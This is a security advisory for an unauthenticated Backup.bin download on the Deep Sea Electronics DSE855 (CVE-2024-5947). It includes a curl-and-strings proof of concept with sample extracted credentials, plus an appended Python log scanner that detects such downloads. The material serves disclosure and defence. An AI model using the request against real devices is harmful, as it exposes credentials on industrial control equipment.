packetstorm | LiquidWorm, zeroscience.mk | PACKETSTORM:179342
History: Jul 03, 2024 - 12:00 a.m.

Deep Sea Electronics DSE855 Remote Authentication Bypass

2024-07-03 00:00:00
LiquidWorm, zeroscience.mk
packetstormsecurity.com
Tags: deep sea electronics, dse855, remote authentication bypass, vulnerability, backup.bin, information disclosure, zsl-2024-5825, zdi-24-671, cve-2024-5947

CVSS3: 6.5

Attack Vector: ADJACENT

Attack Complexity: LOW

Privileges Required: NONE

User Interaction: NONE

Scope: UNCHANGED

Confidentiality Impact: HIGH

Integrity Impact: NONE

Availability Impact: NONE

Vector: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score: 7.1

Confidence: Low

EPSS: 0.001

Percentile: 29.8%

```
Deep Sea Electronics DSE855 Remote Authentication Bypass


Vendor: Deep Sea Electronics plc
Product web page: https://www.deepseaelectronics.com
Affected version: Model: DSE855
Software version: 1.0.26
Module version: 1.0.78
Bootloader version: 1.0.3
Firmware version: 1.1.0

Summary: The DSE855 communications device allows monitoring of a single
DSE controller with USB connectivity over a LAN or WAN connection. To achieve
this the DSE855 utilises its in-built web server or MODBUS TCP. In order
to use over a LAN connection the on-site router must be configured to be
accessible from any global location.

Desc: The device is vulnerable to configuration disclosure when direct object
reference is made to the Backup.bin file using an HTTP GET request. This will
enable an attacker to disclose sensitive information and help her in authentication
bypass, privilege escalation and full system access.

Tested on: embOS/IP


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2024-5825
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5825.php
ZDI ID: ZDI-24-671
ZDI CAN: ZDI-CAN-22679
ZDI URL: https://www.zerodayinitiative.com/advisories/ZDI-24-671/
ZDI Title: (0Day) Deep Sea Electronics DSE855 Configuration Backup Missing Authentication Information Disclosure Vulnerability
CVE ID: CVE-2024-5947
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-5947


10.11.2023

--


$ curl -s -O http://target/Backup.bin
$ strings Backup.bin

DSEB
Admin
Password1234
Tech
Password1234
thricer
scada
rd1234
lokna
xela123
DSE855
```
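A detection-side check for the request shown above, as an added example that is not part of the original advisory: it scans HTTP access logs for retrievals of Backup.bin and marks those where the file was actually served. It assumes Common/Combined Log Format lines from a reverse proxy or network sensor in front of the device (the advisory describes no logging); the function names, sample lines and addresses are constructed.

```python
import re
from urllib.parse import unquote, urlsplit

# Assumption: Common/Combined Log Format written by a proxy or sensor
# placed in front of the DSE855; the advisory itself describes no logging.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

def is_backup_request(target: str) -> bool:
    """True if the request path ends in Backup.bin. Case, percent-encoding
    and query strings are normalised only to widen detection; the advisory
    does not say whether the device accepts such variants."""
    path = unquote(urlsplit(target).path)
    return path.rsplit("/", 1)[-1].lower() == "backup.bin"

def find_backup_downloads(lines):
    """Return one finding per Backup.bin request; 'served' is True when the
    response was 2xx with a body, i.e. the configuration left the device."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not is_backup_request(m["target"]):
            continue
        size = 0 if m["size"] == "-" else int(m["size"])
        findings.append({
            "src": m["src"],
            "time": m["ts"],
            "target": m["target"],
            "served": m["status"].startswith("2") and size > 0,
        })
    return findings

# Constructed sample log lines (documentation address ranges).
SAMPLE = [
    '192.0.2.10 - - [03/Jul/2024:10:00:01 +0000] "GET /index.htm HTTP/1.1" 200 5120',
    '198.51.100.7 - - [03/Jul/2024:10:02:44 +0000] "GET /Backup.bin HTTP/1.1" 200 2048',
    '198.51.100.7 - - [03/Jul/2024:10:02:50 +0000] "GET /%42ackup.BIN?x=1 HTTP/1.1" 200 2048',
    '203.0.113.5 - - [03/Jul/2024:10:05:12 +0000] "GET /Backup.bin HTTP/1.1" 401 0',
]

if __name__ == "__main__":
    for f in find_backup_downloads(SAMPLE):
        state = "SERVED" if f["served"] else "blocked"
        print(f'{f["time"]} {f["src"]} {f["target"]} -> {state}')
```

A finding with `served` set means the credentials stored in the backup should be treated as disclosed and rotated.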
